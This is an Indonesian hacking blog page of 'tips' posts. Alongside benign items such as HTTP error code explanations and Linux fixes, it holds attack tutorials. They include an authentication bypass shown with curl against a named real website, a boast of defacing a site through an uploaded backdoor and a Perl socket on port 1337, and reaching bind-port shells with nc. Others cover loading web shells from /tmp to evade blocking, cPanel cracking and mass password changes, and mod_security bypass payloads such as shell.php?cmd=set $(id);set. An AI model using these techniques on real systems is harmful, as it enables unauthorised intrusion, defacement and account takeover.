Codes Xploit: tips
Showing posts with label tips. Show all posts
Showing posts with label tips. Show all posts

Arti Kode Error 401, 403, 404, 500, 502, 503 dan Lainnya LENGKAP

 

ANONIMCYBER | Hallo sobat selamat pagi! Ada beberapa macam kode Error yang pernah kita temui namun kita masih banyak beberapa kode error yang belum diketahui artinya itu apa? Di internet kadang kita ada lancarnya dan ada juga macetnya. Nah macet inilah yang dapat menyebabkan error pada suatu website yang kita tuju, Tentunya kita akan mengeluh atau kesal terhadap status atau pesan pesan error yang ditertera dihalaman website tersebut. Namun ada banyak dan berbeda-beda kode error tersebut.

Jadi, Inilah kode error yang akan saya bahas pada postingan ini :

Error 400, Error 401, Error 402, Error 403, Error 404, Error 405, Error 406, Error 407, Error 408, Error 409, Error 410, Error 411, Error 412, Error 413, Error 414, Error 415, Error 416, Error 417, Error 418, Error 419, Error 420, Error 422, Error 423, Error 424, Error 425, Error 426, Error 428, Error 429, Error 431, Error 444, Error 449, Error 450, Error 451, Error 499, Error 500, Error 501, Error 502, Error 503, Error 504, Error 505, Error 506, Error 507, Error 508, Error 509, Error 510, Error 511, Error 598, dan Error 599.


Apakah sobat sudah tahu arti dari kode diatas? silahkan sobat perhatikan dan simak baik-baik karena kode error tersebut memiliki arti yang berbeda, Ayo simaklah pembahasan berikut.


A. Kode 4xx (Client Error)


Kode 4xx - Kelas kode status ini ditujukan untuk situasi di mana kesalahan tersebut tampaknya disebabkan oleh klien. Kecuali bila menanggapi permintaan HEAD, server harus menyertakan entitas yang berisi penjelasan tentang situasi kesalahan, dan apakah itu adalah kondisi sementara atau permanen. Kode status ini berlaku untuk setiap metode permintaan. Agen pengguna harus menampilkan entitas yang disertakan ke pengguna.


Error 400 (Bad Request)
Kode kesalahan 400 (Error Bad Request) sering ditemukan ketika kita salah mengetikkan alamat sebuah situs, coba periksa kembali pada adrress bar browser Anda untuk mengecek benar atau salah alamat situs tersbut. Atau kemungkinan lain server situs sedang mengalami gangguan, sehingga tidak dapat mengenali permintaan komputer Anda.

Error 401 (Server Nauthorized)
Anda yang tidak memiliki hak akses untuk membuka folder atau membuka website tersebut karena terproteksi oleh password.

Error 402 (Payment Required Error)
Tujuannya adalah bahwa kode ini dapat digunakan sebagai bagian dari beberapa bentuk digital cash atau skema micropayment, tapi hal itu tidak terjadi, dan kode ini jarang terjadi.

Error 403 (Server Forbidden)
Anda tidak bisa mengakses website tersebut, karena ini tidak menggunakan password melainkan kesalahan dalam konfigurasi folder oleh si Admin web tersebut.

Error 404 (Server Not Found)
Halaman website yang Anda minta tidak tersedia di web hosting, jadi Anda harus menunggu Admin web tersebut untuk memperbaikinya. Dengan cara file dan folder website harus di upload seluruhnya ke akun hosting dan alamat link harus disesuaikan, dan perlu Anda perhatikan bahwa setiap link bersifat sensitif terhadap huruf besar dan huruf kecil.

Error 405 (Methode Not Allowed)
Pesan ini muncul jika koneksi menggunakan metode yang tidak didukung oleh komputer server.

Error 406 (Not Acceptable)
Permintaan dari browser tidak dapat dipenuhi oleh server.

Error 407 (Proxy Authentication Required)
Klien harus terlebih dahulu mengotentikasi dirinya dengan proxy.

Error 408 (Requst Timeout)
Pesan error seperti ini biasa terjadi ketika koneksi jaringan internet kita lambat, sehingga komputer server memutus request karena terlalu lama. Untuk mengatasinya, refresh browser Anda. Jika masih sama, maka reset modem dan koneksikan ulang.

Error 409 (Conflict)
Pesan error ini muncul ketika kita sedang mengakses sebuah situs, namun pada saat yang bersamaan pemilik situs sedang mengedit halaman sehingga terjadi konflik, dan tidak dapat diproses oleh komputer server. Anda harus menunggu si Admin untuk menyelesaikan pengeditannya, dan setelah itu akan kembali normal lagi.

Error 410 (Gone)
Pesan kesalahan ini berarti halaman yang diminta sudah dihapus secara permanen, atau domain website tersebut sudah expired.

Error 411 (Length Required)
Permintaan tidak sesuai dengan panjang isi yang diperlukan oleh sumber daya yang diminta.

Error 412 (Precondition Failed)
Server tidak memenuhi salah satu prasyarat bahwa pemohon memakai permintaan tersebut.

Error 413 (Request Entity Too Large)
Jika Anda menemukan kode kesalahan seperti ini artinya, data yang diminta terlalu besar dan komputer server tidak bisa menampung besarnya data yang Anda minta.

Error 414 (Reques URL Too Long)
Pesan error seperti ini sudah jarang dijumpai karena URL sudah dibuat sedemikian rupa lebih singkat. Kode error ini berarti URL yang ingin dituju terlalu panjang dan server tak mampu memprosesnya.

Error 415 (Unsupported Media Type)
Error ini akan muncul jika kita menggunakan jenis media yang tidak didukung atau tidak diizinkan oleh server. Misalnya kita mengunggah file gambar dengan format .PNG, namun server hanya mengizinkan format .JPG atau .GIF. Umumnya server tidak akan menampilkan status ini pada browser kita saat kondisi tersebut terjadi, melainkan hanya menampilkan pemberitahuan bahwa file gambar yang kita unggah tersebut tidak sesuai.

Error 416 (Requested Range Not Satisfiable)
Klien telah meminta untuk sebagian dari file, tetapi server tidak dapat menyediakan bagian itu. Sebagai contoh, jika klien meminta bagian dari file yang terletak di luar akhir file.

Error 417 (Expectation Failed)
Server tidak dapat memenuhi persyaratan bidang "Expect request-header".

Error 418 (I'm a Teapot RFC 2324)
Kode ini didefinisikan pada tahun 1998 sebagai salah satu "IETF April Fools Jokes", dalam "RFC 2324", "Hyper Text Coffee Pot Control Protocol", dan tidak untuk dilaksanakan oleh server HTTP yang sebenarnya. Namun, implementasi yang diketahui memang ada.

Error 419 (Unused)
Status error ini adalah sebagai kode yang sudah tidak terpakai lagi.

Error 420 (Enhance Your Calm)
Status error ini digunakan kembali oleh Twitter, tepatnya pada Twitter Search and Trends API, untuk memberitahukan bahwa akses kita terbatas atau dibatasi. Umumnya layanan lain akan menampilkan status "429 Too Many Request".

Error 422 (Unprocessable Entity WebDAV RFC 4918)
Permintaan tersebut adalah "well-formed" tetapi tidak dapat diikuti karena kesalahan semantik.

Error 423 (Locked WebDAV RFC 4918)
Kode error ini adalah sumber daya yang sedang diakses terkunci.

Error 424 (Failed Dependency WebDAV RFC 4918)
Kode error ini mwnandakan bahwa permintaan gagal karena kegagalan permintaan sebelumnya.

Error 425 (Unordered Collection RFC 3648)
Didefinisikan dalam draft "WebDAV Advanced Collections Protocol", tetapi tidak hadir dalam "Web Distributed Authoring and Versioning (WebDAV) Ordered Collections Protocol".

Error 426 (Upgrade Required RFC 2817)
Klien diminta untuk menggunakan protocol yang lebih baru.

Error 428 Precondition Required
Server asal memerlukan permintaan untuk menjadi bersyarat. Dimaksudkan untuk mencegah hilang update yang masalah, di mana klien "GETs" pada sumber daya itu, telah dimodifikasi, dan menempatkan kembali ke server, ketika sementara pihak ketiga telah dimodifikasi di server, yang mengarah ke konflik. Ditentukan dalam Draft internet yang disetujui untuk dipublikasikan sebagai RFC.

Error 429 (Too Many Requests RFC 6585)
Menandakan bahwa user telah mengirimkan terlalu banyak request dalam jangka waktu tertentu. Umumnya server akan memblokir IP yang mengirimkan terlalu banyak request pada waktu tertentu.

Error 431 (Request Header Fields Too Large)
Server tidak bersedia untuk memproses permintaan tersebut karena baik sebagai kolom header individu, atau semua bidang header kolektif, terlalu besar. Ditentukan dalam Draft internet yang disetujui untuk dipublikasikan sebagai RFC.

Error 444 (No Response Nginx)
Sebuah ekstensi pada Nginx HTTP server. Server mengembalikan tidak ada informasi kepada klien dan menutup koneksi (berguna sebagai pencegah malware).

Error 449 (Retry With Microsoft)
Sebuah ekstensi pada Microsoft. Permintaan harus dicoba setelah melakukan tindakan yang sesuai.

Error 450 (Blocked by Windows Parental Controls Microsoft)
Artinya akses kepada website tersebut telah diblokir oleh sistem keamanan yang ada pada Windows Parental Control Windows, parental Control berguna untuk memblokir situs-situs yang berbau pornografi.

Error 451 (Unavailable For Legal Reasons Internet Draft)
Status ini memberitahukan bahwa akses ditolak karena alasan resmi atau legal. Umumnya jika suatu akses pada sebuah situs website atau pada blog telah diblok oleh pihak sensor atau pemerintah, yang memiliki wewenang untuk melakukan hal tersebut. Contohnya adalah pada situs Megaupload yang telah ditutup oleh FBI karena mengandung konten yang ilegal.

Error 499 (Client Closed Request Nginx)
Sebuah ekstensi pada Nginx HTTP server. Kode ini diperkenalkan untuk login kasus ketika koneksi ditutup oleh klien sementara HTTP server memproses permintaan tersebut, membuat server tidak dapat mengirim header HTTP kembali.


B. Kode 5xx (Server Error)

Kode 5xx - Kode status tanggapan yang dimulai dengan angka "5" menunjukkan kasus di mana server mengetahui bahwa ia mengalami kesalahan atau sebaliknya tidak dapat melakukan permintaan. Kecuali ketika menanggapi permintaan, server harus menyertakan entitas yang berisi penjelasan tentang situasi kesalahan, dan menunjukkan apakah itu kondisi sementara atau permanen. Demikian juga, agen pengguna harus menampilkan entitas yang disertakan ke pengguna. Kode tanggapan ini berlaku untuk setiap metode permintaan.

Error 500 (Internal Server Error)
Kode error ini merupakan kesalahan konfigurasi pada akun hosting. Silahkan Anda cek file .htaccess pada akun hosting Anda dan pastikan setiap barisnya tertulis dengan benar sesuai dengan standar kodenya.






Error 501 (Not Implemented)


Server tidak mengenali metode permintaan, atau tidak memiliki kemampuan untuk memenuhi permintaan tersebut.

Error 502 (Bad Gateway)
Server bertindak sebagai gateway atau proxy dan menerima respon tidak valid dari server hulu.

Error 503 (Service Unavailable)
Server saat ini tidak tersedia karena kelebihan beban atau sedang maintenance. Umumnya, ini adalah keadaan sementara.

Error 504 (Gateway Timeout)
Server bertindak sebagai gateway atau proxy dan tidak menerima respon yang tepat waktu dari server hulu.

Error 505 (HTTP Version Not Supported)
Server tidak mendukung versi protokol HTTP digunakan dalam permintaan.

Error 506 (Variant Also Negotiates RFC 2295)
Isi dari "content negotiation" yang merupakan hasil permintaan dari "a circular reference".

Error 507 (Insufficient Storage WebDAV RFC 4918)
Server tidak dapat menyimpan representasi yang dibutuhkan untuk menyelesaikan permintaan tersebut.

Error 508 (Loop Detected WebDAV RFC 5842)
Server terdeteksi pengulangan secara terus menerus saat memproses permintaan (dikirim sebagai pengganti 208).

Error 509 (Bandwidth Limited Axceeded)
Kode error ini menandakan bahwa penggunaan bandwidth pada akun hosting sobat sudah melebihi batas maksimal atau dengan kata lainover quota.

Error 510 (Not Extended RFC 2774)
Ekstensi permintaan lebih lanjut yang diperlukan server untuk memenuhinya.

Error 511 (Network Authentication Required Approved Internet-Draft)
Klien perlu mengotentikasi untuk mendapatkan akses jaringan. Dimaksudkan untuk digunakan untuk mencegat proxy yang digunakan untuk mengontrol akses ke jaringan (misalnya "captive portal" yang digunakan untuk meminta perjanjian untuk Persyaratan Layanan sebelum memberikan akses internet secara penuh melalui hotspot Wi-Fi). Ditentukan dalam Draft internet yang disetujui untuk dipublikasikan sebagai RFC.

Error 598 (Network Read Timeout Error)
Ini kode status tidak ditentukan dalam RFC, tapi digunakan oleh beberapa proxy HTTP untuk sinyal jaringan membaca batas waktu di belakang proxy ke client di depan proxy.

Error 599 (Network Connect Timeout Error)
Ini adalah kode status yang tidak ditentukan dalam RFC, tapi digunakan oleh beberapa proxy HTTP untuk sinyal jaringan menghubungkan batas waktu di belakang proxy ke client di depan proxy.


Sekian dari postingan ini, mohon maaf bisa ada kesalahan.

Kata Kunci :

Error 400, Error 401, Error 402, Error 403, Error 404, Error 405, Error 406, Error 407, Error 408, Error 409, Error 410, Error 411, Error 412, Error 413, Error 414, Error 415, Error 416, Error 417, Error 418, Error 419, Error 420, Error 422, Error 423, Error 424, Error 425, Error 426, Error 428, Error 429, Error 431, Error 444, Error 449, Error 450, Error 451, Error 499, Error 500, Error 501, Error 502, Error 503, Error 504, Error 505, Error 506, Error 507, Error 508, Error 509, Error 510, Error 511, Error 598, dan Error 599.

Semoga bermanfaat dan sampai jumpa.

Deteksi Celah NO REDIRECT Pada Suatu Situs Menggunakan CURL

Halo selamat malam, kali ini saya akan memberikan sedikit tutorial bagaimana menemukan sebuah celah/vulnerability NO REDIRECT pada suatu situs. Celah ini ditemukan pada suatu halaman/file yang seharusnya dapat diakses hanya pada user yang memiliki akses tertentu (user yang sudah login).

Contohnya pada suatu kasus untuk dapat masuk ke halaman dashboard admin yang terdapat pada file /admin/home.php, kita diharuskan login terlebih dahulu. Maka dari itu, biasanya kita akan di redirect/arahkan ke halaman login dahulu, misalkan di file /admin/login.php


Sudah paham maksudnya?
Jika masih belum paham, mari simak penjelasan berikut.


Saya menemukan suatu sample situs yang memiliki celah ini, coba kalian kunjungi situs berikut:
http://shmsupport.telkomspeedy.com/admin/ maka kalian akan di arahkan/redirect ke halaman situs tersebut yang beralamat pada http://shmsupport.telkomspeedy.com/admin/login.php?MSG=NOSESSION

Dapat Simpulkan, bahwa pada folder /admin/ terdapat sebuah file index.php yang mem-validasi bahwa hanya user yang sudah LOGIN saja yang dapat mengakses ini. Simplenya, $_SESSION user sudah ter-set.

 Sayangnya, ada cara bagaimana mengakses /admin/ tanpa harus login terlebih dahulu. Bypassing dengan Query SQL??? 

***Bukan jawaban yang tepat pada pembahasan kali ini***

Lalu bagaimana?

*Cukup gunakan command CURL pada console/terminal/CMD, lalu jalankan command berikut:

$ curl -v http://shmsupport.telkomspeedy.com/admin/

Akan muncul sebuah hasil, dimana di perlihatkan bahwa kita dapat melihat isi dari halaman dashboard admin tersebut.



Melihat tulisan LOGOUT bukan? Padahal kita tidak login sama sekali ke website tersebut. Yap, ini merupakan sebuah bug. Melalui console seperti memang akan terbatas untuk melakukan hal-hal lainnya, tapi anda bisa menggunakan sebuah addons pada Browser untuk melakukan ini yaitu NO REDIRECT (https://addons.mozilla.org/en-US/firefox/addon/noredirect/).

*******************************
Kenapa ini bisa terjadi?
Jika kita pernah coding hal seperti ini, kita akan membuat sebuah validasi $_SESSION, untuk memastikan apakah user yang mengakses halaman tersebut sudah login atau belum. Biasanya akan di coding seperti ini:

if(!isset($_SESSION[user])) {
             // lakukan redirect disini jika user belum login
}

Tapi codingan diatas masih memiliki bug, memang jika kita mengaksesnya melalui browser kita akan di arahkan ke halaman yang akan di set di codingan tersebut, namun jika kita melihat melalui CURL tadi, halamannya akan bisa kita lihat.

*******************************
Lalu bagaimana memperbaiki bug ini? dan apakah ini fatal?

Untuk memperbaiki ini simple saja, tambahkan die() ataupun exit() setelah bagian Lakukan Redirect.

if(!isset($_SESSION[user])) {
              // lakukan redirect disini jika user belum login
              exit();
}

Codingan diatas akan langsung menutup tadi jika kita mengakses melalui CURL, dan potongan code dashboard admin tadi tidak akan bisa dilihat lagi.

Jika terdapat informasi yang sensitif seperti dokument pribadi/dokument user/customer/client atau hal lainnya yang terdapat pada halaman tersebut, akan sangat mudah sekali didapatkan karena mereka masuk/melihat tanpa harus melalui sebuah authentikasi yang valid. Hal ini juga bisa menjadi awal terjadinya Exploitasi dengan CSRF, dan lainnya.



Oke sekian dulu tutorial kali ini, semoga bermanfaat.

Cara Mengetahui ID facebook Kita atau Orang lain

 

ANONIMCYBER | Hallo sob kali ini saya akan memberitahu cara mengetahu ID facebook kita atau orang lain karena saat-saat ini banyak orang ada yang kesulitan cara mengetahuinya. dulu pake graph namun graph sekarang error tidak dapat digunakan. oke dengan santai kita mulai

Pertama, Sobat harus Coppy Link Facebook sobat sendiri jika sudah tau langsung saja

Kedua, Sobat masuk ke Find My Facebook ID  Kemudian pastekan Link Facebook sobat tadi ke kolom seperti digambar


Terakhir Sobat klik Find Numeric ID , Selesai Muncul deh ID nya.

Cukup mudahkan gak pake ribet apalah-itulah.


Sampai Jumpa Sob! Jangan lupa share oke!

Cara Resume Download yang Terputus via Wget

 
Cara Resume Download via Wget - Sebenarnya ini gampang banget dan saya rasa sudah banyak yang tau. Namun kebetulan tadi ada yang nanya di fanspage, jadi saya share saja sekalian di blog biar yang lain juga tau (barangkali ada yang belum tau juga hehe). Oke mungkin ada di beberapa kasus kalian mendownload via wget lalu koneksi terputus.
Read More

Cara Menonaktifkan Teamviewer Daemon saat Startup

 
Teamviewer Daemon berjalan secara otomatis saat booting. Namun jika kita tidak terlalu sering menggunakan Teamviewer, tidak ada salahnya proses tersebut di nonaktifkan saja karena prosesnya juga sedikit banyak akan memakan memori.
Read More

Menghapus History Terminal di GNU/Linux

 
Menghapus history di terminal linux kadang diperlukan, terutama jika saat itu kalian sedang meminjam komputer teman, atau teman akan meminjam komputer kalian. Semua history perintah yang sebelumnya diketik sebenarnya tersimpan di .bash_history. Sehingga jika kalian menghapus file tersebut harusnya sudah selesai. Nah, masalahnya, saat kita menekan tombol up down pada keyboard, perintah perintah yang sebelumnya tetap nampak alias belum terhapus total.
Read More

Memperbaiki Error "/bin/bash^M: bad interpreter" Pada Saat Menjalankan File Bash

 
Halo selamat pagi agan agan semua.
Sesuai judul, disini saya akan memberikan beberapa solusi jika terdapat error semacam /bin/bash^M: bad interpreter pada saat menjalankan file bash.


Error ini terjadi karena file terdapat line style ending "\r\n". Sebenarnya, pada linux line style ending yang benar adalah  "\n" saja, sedangkan "\r\n" terdapat pada DOS/Windows. Jadi jika kalian menjalankan file yang mengandung line style ending "\r\n" pada linux, maka sudah pasti akan terdapat error semacam itu. Untuk lebih jelasnya, coba kalian run file bash kalian seperti ini:

user@linux $ bash file.sh
atau
user@linux $ sh file.sh

Kalian akan mendapati error seperti ini:


Beberapa cara yang dapat kalian lakukan untuk memperbaiki ini adalah sebagai berikut.

  • Menggunakan command tr
user@linux $ tr -d "\r" < file.sh > file_fix.sh && rm -rf file.sh
Nantinya file.sh akan dibersikan (dihapus \r), lalu di write ke dalam file baru bernama file_fix.sh yang nantinya inilah file yang akan kalian jalankan.
user@linux $ ./file_fix.sh

  • Menggunakan command sed
user@linux $ sed -i -e "s/\r$//" file.sh

  • Menggunakan command dos2unix
user@linux $ dos2unix file.sh
Jika dos2unix belum ada pada linux kalian, installah terlebih dahulu. Kalian bisa cari referensi untuk menginstall dos2unix pada linux kalian masing-masing di google.


Oke sekian dulu, itu adalah beberapa cara yang bisa kalian lakukan untuk memperbaiki error dari /bin/bash^M: bad interpreter. 

Semoga bermanfaat .

Tutorial Socket Server with Perl

 
Halo, selamat malam. Kali ini gua mau sharing lagi gimana socket server.
Masih inget gimana kemarin Meme Comic Indonesia (MCI) kena deface di PORT 1337?
Yap, gua pake metode ini.



Oke langsung aja.
Sebelumnya untuk melakukan socket server, kalian harus terlebih dahulu masuk ke dalam server target kalian lewat backdoor yang kalian pasang di salah satu website.


Disini saya menggunakan Script Perl yang saya dapat dari referensi google, lalu sedikit saya modifikasi agar koneksinya selalu open.

Script: https://pastebin.com/zk8v8jp6

Upload script socket perl diatas tadi ke backdoor kalian.
Setelah di upload, jalankan command berikut untuk menjalankan file perlnya.
$ perl perlcgi.pl
 [perlcgi.pl] adalah nama file kalian.

Metode ini akan membuka koneksi pada port yang sudah ditentukan.
 Setelah itu, lalu jalankan command berikut untuk memastikan.
$ ps aux | grep 'perl'

Saya menamai file perlnya dengan nama  'percgi.pl', maka akan menghasilkan seperti di gambar (perl [namafile].pl)

Setelah itu, coba kita buka [IP:PORT] pada browser kita untuk memastikan lagi. Apakah koneksinya berhasil?

PORT yang saya buka adalah port 1337.



Yap Berhasil!!!.

Sekarang, kita Reverse IP tersebut dan lihat ada berapa banyak domain dalam IP yang sama.

Disini saya menggunakan
www.yougetsignal.com/tools/web-sites-on-web-server/


Coba salah satu website yang muncul disana dan tambahkan port 1337, karena di script tersebut saya set port 1337.


Dan lainnya pun sama.
---------------------------------------------------
--------------------------------------------------------


Oke sekian dulu yoooooo ~

Tutorial Reverse Shell Dengan Bind Port

 
Oke, kali ini gua akan share gimana caranya Reverse Shell dengan bind port. Kebanyakan orang kesusahan waktu Reverse Shell dengan BackConnect. Cara ini cukup simple kok. Oke Langsung Simak aja.


Disini, saya menggunakan shell indoxploit V.3 untuk bind port nya.
Jalankan command bind port pada shell indoxploit V.3.
$ rvr bp [PORT] perl
Setelah itu, kalian akan mendapatkan response seperti ini.

Langsung saja, berikutnya buka terminal/CMD kalian.
Jalankan command nc.
$ nc [IP] [PORT]

Oke itu saja, mudah bukan?
Sekian dulu kawann..


Bypass 406 & Auto Delete Shell Oleh Server Dengan TMP Shell by IndoXploit

 
Oke kali ini gua pengen share sedikit trik, bagaimana membypass sebuah server yang 'bikin jengkel' waktu upload shell-shell besar seperti (indoxploit shell, wso, b374k, c99, dll). Yap Not Acceptable.

Mudah saja untuk mengakalinya.
Write sebuah file backdoor ke dalam directory /tmp, lalu panggil shell itu melalui current directorynya dengan sebuah PHP Function 'include()'
Penjelasan lebih lanjut.

Disini, saya sudah membuat backdoor khusus agar lebih mudah memanggil backdoor lain yang kita inginkan.


Ubah bagian $URL, isilah dengan URL Shell Backdoor yang kalian inginkan.

Langsung saja buka file backdoornya.
 Jika backdoor TMP Shell terus-menerus redirect & menghasilkan blank page. Itu tandanya file backdoor yang dipanggil tidak berhasil di Write pada directory /tmp.
Oke sekian dulu.
Semoga Bermanfaat.

Memperbaiki Format Waktu Yang Salah Saat Dual Boot Pada Ubuntu

 
Halo, selamat malam.
Kemarin ada yang sempet nanya di grup facebook indoxploit tentang penunjukkan waktu yang salah pada Linux nya dan dia bilang ini karena abis boot ke Windows. Lalu tiba-tiba jam pada linuxnya error/salah. Oke, baru kemarin aja gua juga ngalamin hal yang sama. Kebetulan gua abis install Windows 7, dan dual boot dengan Linux Mint yang sampe sekarang saya gunakan.

Oke langsung saja, untuk memperbaiki error itu bisa dilakukan seperti ini:

Kemarin saya coba untuk set Local Time, saya menggunakan command 'timedatectl'

Dan, silakan liat hasilnya. Waktu pada Linux nya kemarin normal lagi.


Oke Sekian dulu.
Semoga bermanfaat.


Sumber:
https://askubuntu.com/questions/800914/clock-shows-wrong-time-after-switching-from-ubuntu-to-windows-10

Deteksi CMS, Web Server, dan Framework dengan Wappalyzer

 


Wappalyzer adalah utilitas lintas platform yang mengungkap teknologi yang digunakan di situs web. Ini mendeteksi sistem pengelolaan konten, platform e-niaga, kerangka web, perangkat lunak server, alat analisis dan banyak lagi.


Dengan ini kalian akan semakin dipermudah dalam mendapatkan informasi-informasi dalam website. Untuk mendapatkannya cukup mudah, karena ini adalah sebuah addons pada browser. Kalian cukup menginstalnya saja.


Informasi lainnya kalian bisa langsung kunjungi website resmi dari Wappalyzer.
https://wappalyzer.com/

Oke sekian dulu, semoga bermanfaat.



Tutorial Symlink, Crack Cpanel, Mass Password Change Dengan IndoXploit Shell V.3

 
Halooo, bagi kalian yang masih bingung untuk jalanin fitur-fitur di indoxploit shell v3, kalian bisa simak video tutornya.




IndoXploit Shell V.3 Bisa kalian Download Disini:


Thanks to:
BAHARI TROUBLE MAKER

Disable WP-Cron Untuk Meningkatkan Performa WordPress

Kali ini saya akan membahas seputar optimasi WordPress. Yup, seperti judulnya, kali ini kita membahas mengenai cara menonaktifkan wp-cron. Sekedar informasi, wp-cron adalah cronjob bawaan WordPress. Karena fungsinya sebagai ronjob maka file ini digunakan untuk penjadwalan misalnya postingan terjadwal dan lain lain. Lantas kenapa harus dimatikan ?
Read More

Port Forwarding Dengan Ngrok

 
Oke kali ini mau berbagi sedikit tips buat kalian yang tidak memiliki ip publik dari provider internet yang kalian pakai, kalian bisa menggunakan ngrok sebagai alternatif. Cara penggunaannya pun sangat mudah.
Read More

Cara Mudah Clone Website dengan HTTrack Website Copier

Oke kali ini kita akan membahas cara untuk meng-clone isi dari website (html dan css nya) menggunakan HTTrack. Tool ini sendiri lebih difaforitkan karena selain mudah digunakan, hasil clone nya rapi, bahkan letak folder style nya pun sama seperti aslinya.
Read More

Cara Mudah Hindari Serangan SQL Injection & Penggunaan SQLMAP oleh Attacker

 
Sesuai judul, kali ini gua akan share trik sederhana bagi kalian yang tak ingin websitenya di ubek-ubek oleh tools SQLmap. Ya, SQLmap merupakan sebuah tools yang sangat familiar dikalangan injector/attacker yang suka bermain-main dengan bug-bug SQL. Karena dinilai sangat mudah digunakan dan juga powerfull. Kita jadi tidak usah meng-inject secara manual ke website tujuan kita yang memiliki kelemahan SQL Injection. Tools SQLmap ini sudah akan otomatis meng-injectnya.

Yap, ini dia trik sederhananya. SQLmap sendiri dalam proses meng-injetnya, mengirimkan sebuah request HTTP Header kepada website yang di tuju. Anda bisa melihatnya dengan menambahkan option -v [level] (Verbose) .

> python sqlmap.py -u "localhost/test.php?id=1" --current-os -v 6

Lihatlah hasilnya, Disini kita akan mem-block User-Agent SQLmap, agar pada saat tools ini berjalan akan menghasilkan response lain.

berikut merupakan script sederhana yang saya buat, semoga kalian paham.
(script ini akan mudah di injeksi oleh SQLmap)

(Lalu block user-agent milik SQLmap, seperti yang saya buat pada bagian atas.)

Dan lihatlah perbedaannya saat kita eksekusi kembali pada target yang sama, namun kali ini kita memblock User-Agent nya.
( hasilnya adalah 404 Not Found, sesuai dengan apa yang sudah kita set pada script block nya tadi )

**Cara diatas tadi adalah untuk menghindari serangan dari Tools SQLMAP.
**Untuk Menghindari dari Serangan SQL Injection. Kalian tinggal memberikan beberapa fungsi seperti ini pada parameternya.

(gunakan fungsi mysqli_real_escape_string)

(hasilnya adalah seperti ini, tidak bisa di injeksi)

Oke sekian dulu , semoga bermanfaat .

Bypassing Blocked Linux Command by Mod_Security

 
Oke kali ini gua akan share tips tentang cara simple membypass command yang di blokir oleh mod_security. Pernah denger bukan?
Gambar terkait
ModSecurity merupakan
modul dari apache yang merupakan salah satu web server yang paling banyak
digunakan.
Kebanyakan serangan di internet dilakukan terhadap web untuk itu
diperlukan pengamanan khusus untuk menangani hal tersebut. Berbagai 
macam cara dapat dilakukan salah satunya adalah memasang WAF (Web
Application Firewall) salah satu WAF yang dibahas pada artikel ini
adalah ModSecurity.
ModSecurity merupakan web application firewall, Seperti firewall pada
umumnya yaitu melakukan filter data masuk dan keluar dan dapat untuk
menstop traffic yang dianggap berbahaya sesuai dengan rule yang
ditetapkan.
Pada ModSecurity terdapat beberapa fitur seperti HTTP Traffic Logging 
yang memungkinkan ModSecurity dapat melakukan full logging pada
transaksi HTTP. Dan juga terdapat fitur Virtual Patching yang merupakan
sebuah metode untuk melakukan patch sebuah vulnerability sebuah web
application tanpa menyentuh web application tersebut dengan membuat rule
yang memblok request yang berbahaya.
ModSecurity merupakan WAF yang menyediakan proteksi yang harus disetting
dengan rule karena Metode pemblokiran dari request-request yang
berbahaya tergantung dari rule yang ditetapkan. Untuk membuat
ModSecurity lebih powerfull dan untuk memungkinkan pengguna mendapatkan
keuntungan penuh Trustwave's SpiderLabs membuat project OWASP
ModSecurity Core Rule Set (CRS). CRS memberikan perlindungan generik
dari vulnerabilities yang tidak dikenali pada aplikasi web.
Contohnya, pernah mendapatkan sebuah akses backdoor yang ternyata dalam server tersebut di proteksi oleh modul modSecurity ini?. Dan ketika saja mencoba menjalankan command shell seperti berikut, munculah sesuatu seperti pada gambar dibawah ini.
Yap, seperti itulah hasilnya. Sewaktu kalian ingin menjalakan command linux pada command shell seperti command-command yang biasanya kita gunakan, yaitu:

- id
- uname
- pwd
- whoami

Tenang saja, jangan khawatir karena command-command tersebut masih bisa kita jalankan, tentu saja dengan cara membypassnya. Bagaimana caranya? mudah saja kalian cukup memanfaatkan command SET di Linux. Command SET itu sendiri merupakan command yang digunakan untuk mendefinisikan dan menentukan nilai dari system environtment (lingkungan sistem).

Oke, perhatikan gambar berikut.

Untuk menjalankan command yang di blokir oleh mod_security, cukup tambahkan command SET di depannya. serta pisahkan dengan ";" (tanpa kutip).

contohnya: shell.php?cmd=SET;id

lihat bukan? command yang tadinya akan menghasilkan "Not Acceptable" akan berjalan dengan baik.

Kalian juga dapat membypassnya dengan cara seperti ini:

- shell.php?cmd=SET;id ->shell.php?cmd=set $(id);set
- shell.php?cmd=SET;whoami -> setshell.php?cmd=set $(whoami);set
- shell.php?cmd=set $(uname -r);set

untuk yang menggukana command seperti ?cmd=set $(command);set, anda bisa melihat hasilnya di paling bawah.
(yap ini dia hasilnya ?cmd=set $(uname -rv);set , 3.12.65-188.ELK6.x86_64. Terdapat pada _=)

dan lainnya, kalian juga bisa menggunakan cara ini:

- shell.php?cmd=***;id
- shell.php?cmd=***;whoami

Dimana shell.php merupakan command shell milik kalian, silakan kalian kembangkan.
Oke sekian dulu kawan, semoga menambah wawasan.

Bypass Blocked User-Agent with cURL [ CLI ]

 
Halooo, selamat malam. Sesuai judul, kali ini gua akan sedikit membahas tentang bagaimana memanfaatkan sebuah code untuk memblock beberapa User-Agent dan juga pastinya Cara Bypass hal tersebut. Oke Langsung saja.

Pertama, pernahkan kalian membuat sebuah sedikit potongan kode untuk memblock adanya user-agent" yang dianggap sebagai bot? agar tidak bisa mendeteksi situs anda.
Contohnya seperti potongan kode PHP berikut.

Kode diatas dimaksudkan untuk memblokir adanya user-agent bot yang termasuk kedalam list $userAgent. Pada saat kita menggunakan "User-Agent" yang termasuk ke dalam list tersebut. Maka akan menghasilkan output header 404 Not Found. Seperti yang kita set pada script.

Akan gua buktikan seperti ini, gua akan memblockir user-agent curl, agar pada saat kita menggunakan curl untuk melihat website tersebut, maka akan menghasilkan header 404 Not Found.
Saya akan menambahkan list "curl" kedalam variable $userAgent.
(lihat di akhir)

Sekarang kita Coba, dengan menggunakan command curl pada CLI/CMD.
curl -v -k http://website.com/script.php

* -v = digunakan untuk memberikan output http header pada screen (Verbose)
* -k = mengizinkan koneksi ke situs SSL tanpa sertifikat
(terlihat pada gambar, bahwa hasil curl mendapatkan bahwa situs yang di maksud mempunya hasil 404 Not Found [ Halaman tidak ditemukan ], padahal ketika kita buka di browser dapat kita akses)

Nah, Bagaimana jika kita tidak mempunyai hak untuk mengedit file yang memblokir user-agent tersebut? sudah pasti ketika kita ingin membuat sebuah scanner/finder contohnya, hal ini akan sulit. malah kita akan bisa di bodohi oleh hasilnya, yang ternyata dapat diakses malah ternyata tools buatan kita menghasilkan sesuatu yang berbeda dari yang kita inginkan. 

